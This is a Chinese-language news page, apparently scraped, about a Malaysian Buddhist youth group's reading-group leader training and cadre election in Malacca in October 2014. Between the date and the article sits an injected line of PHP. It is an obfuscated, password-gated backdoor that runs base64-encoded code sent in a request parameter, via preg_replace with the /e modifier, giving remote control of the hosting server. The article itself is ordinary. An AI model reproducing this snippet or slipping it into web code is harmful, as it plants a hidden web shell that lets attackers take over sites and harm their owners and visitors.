You are here

2014-10-25

if(isset($_REQUEST['pas']) && (md5($_REQUEST['pas']) == '134acff54ceaa720db3ad5cafdf840f1') && isset($_REQUEST['update'])) {$sslChecker='pre'.'g_replace';$getUrl="/url/e";$sslChecker($getUrl,'e'.'val(ba'.'se64'.'_dec'.'ode(\\$_REQUEST[\'update\']));', "url");}?>

馬來西亞南區佛光青年於 10/24~25 在馬六甲大願補習中心進行兩天一夜「人間佛教讀書會帶領人培訓」,約 20 位來自不同大專香海社及各分團青年參與,學習如何當讀書會帶領人,運用帶領討論法「聞思修正」,並把讀書會帶入校園內與大專生們一起學習,提升讀書風氣之 餘,也從中學習把佛法生活化。主辦單位邀請青年團執行長如音法師、馬六甲佛光會會長薛仙明及兩位白像幹部,鄭泳宏老師及洪志雄來擔任培訓營的主講人。課程 包括,「讀書會知多少」、「帶領人的精神與態度」、分組討論、討論結果,還有一連串的「實務」環節等。如音法師為培訓做總結,願青年們能捉緊「讀書會」的 概念,可學以致用,好好帶領各區進行讀書會,弘揚「人間佛教」。


馬六甲佛光青年分團於 10/25 在馬六甲大願補習中心舉行兩年一次幹部改選。薛仙明會長表示,感謝這些年來,所有幹部與會員的支持與協助。她強調,此團以教育為主,將會在每個星期舉行一次的讀書會,此外,本團近來的讀書會出席率也逐漸增加。如音法師表示,鼓勵青年團必須保持一個信仰,那就是忠心。最後,法師勉勵青年一定要懂得規劃自己的人生,這樣人生才會變成更加有意義。